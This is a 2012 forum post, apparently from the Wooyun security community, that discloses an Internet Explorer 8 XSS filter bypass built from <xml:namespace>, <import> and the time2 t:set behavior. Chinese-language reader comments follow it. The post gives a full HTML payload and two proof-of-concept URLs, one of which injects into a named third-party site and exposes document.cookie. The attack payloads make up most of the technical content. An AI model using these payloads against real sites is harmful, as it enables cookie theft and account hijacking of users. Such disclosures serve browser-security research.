IE8 xss filter bypass

gainover | 2012-10-25 11:07

Note: IE 10 have fixed this issue,and IE8 …

————————————————-

1. a <?import … > tag can also be written as a <import …> tag.

<html>

<body>

<div>

<div id="x">x</div>

<xml:namespace prefix="t">

<import namespace="t" implementation="#default#time2">

<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;">

</div>

</body>

</html>

the code above will execute script fragment in “to” attribute.

Furthermore, we found this xss vector contructed from the three tags (<xml> <import> & <t:set …>) can bypass the IE8 xss filter.

————————————————-

POC1: use <import …>

http://xsst.sinaapp.com/example/1-1.php?page=<div id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;1%26%23x29;%26gt;>

while  using <?import …> will trigger the xss filter to intercept our code.

2. Our code should start with “>, when we encounter the  case like : <input type=”text” value=”{parameter under controlled}”>. The “> will trigger the xss filter, and it will replace some words like ‘namespace’ and ‘attributeName’ in our code. My friend @jackmasa (https://twitter.com/jackmasa)(@xxx in Wooyun.org) gave me a trick to solve the problem:  “x> (x represents any letter) cannot trigger the filter.

————————————————-

POC2:

http://www.53kf.com/product.php?arg=&search="id=><div/id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;document.cookie%26%23x29;%26gt;>

That’s all. Thanks for help from my friend jackmasa (@xxx in Wooyun.org).

Author: Gainover

Group:  PKAV .net & Wooyun.org

1#shine | 2012-10-25 11:18

顶一下二哥!规范了,专注了。

 

2#Rookie | 2012-10-25 11:21

必须顶..楼下跟上

 

3#p.z | 2012-10-25 11:37

顶了!

 

4#xsser | 2012-10-25 11:59

喜欢了…感谢了…

 

5#半世倾尘 | 2012-10-25 12:25

怎末用,,,,

 

6#/fd (Http://prompt.ml) | 2012-10-25 13:39

牛!

 

7#wanglaojiu (天若有情天亦老人若有情死得早,凶胎又侧漏了) | 2012-10-25 15:57

mail可用

 

8#beastk | 2012-10-25 16:03

good job!

 

9#rayh4c | 2012-10-25 18:26

这也发现了!没想到去掉?也可以。

 

10#horseluke (微碌) | 2012-10-25 18:47

http://xsst.sinaapp.com/example/1-1.php

《XSS教学 – by gainover》好东西啊…….

 

11#gainover | 2012-10-25 19:20

@horseluke = = 擦。。你们别访问多了。。要云豆的好吧~

 

12#popok (我是你们的大爷)‮(宗祖的们你是我) | 2012-10-25 20:56

@gainover 大牛和新浪的联系一下呗,让他们给你认证一个开发者

 

13#horseluke (微碌) | 2012-10-26 10:38

@gainover 可以申请认证开发者的

 

14#gainover | 2012-10-26 10:44

@horseluke = = 没啥程序可认证的。。就一直没去申请了。

 

15#rootkit | 2012-10-26 10:45

@gainover http://xsst.sinaapp.com/example/1-1.php
求更新啊

 

16#gainover | 2012-10-26 10:49

@rootkit 有空我再写写吧。。 最近一直懒的动手。。

 

17#/fd (Http://prompt.ml) | 2012-10-26 14:11

@gainover 話說可否在header加個charset…亂碼

 

18#xixi | 2012-10-26 14:41

赞一个。

 

19#kamikaze | 2012-10-26 14:58

这个跨站不用import都能利用

 

20#xsser | 2012-10-26 15:13

@rayh4c 给力吧~

 

21#gainover | 2012-10-26 15:51

@kamikaze style & behavior 么?

 

22#kamikaze | 2012-10-26 16:15

@gainover

 

23#
感谢(1)px1624 (aaaaaaaaa) | 2012-10-26 20:06

撸一下吧。。

 

24#Henry:bobo (胖吊一枚 看什么看 又高又肥2个奶奶像地雷) | 2012-10-29 01:10

给力 又科普了 二哥厉害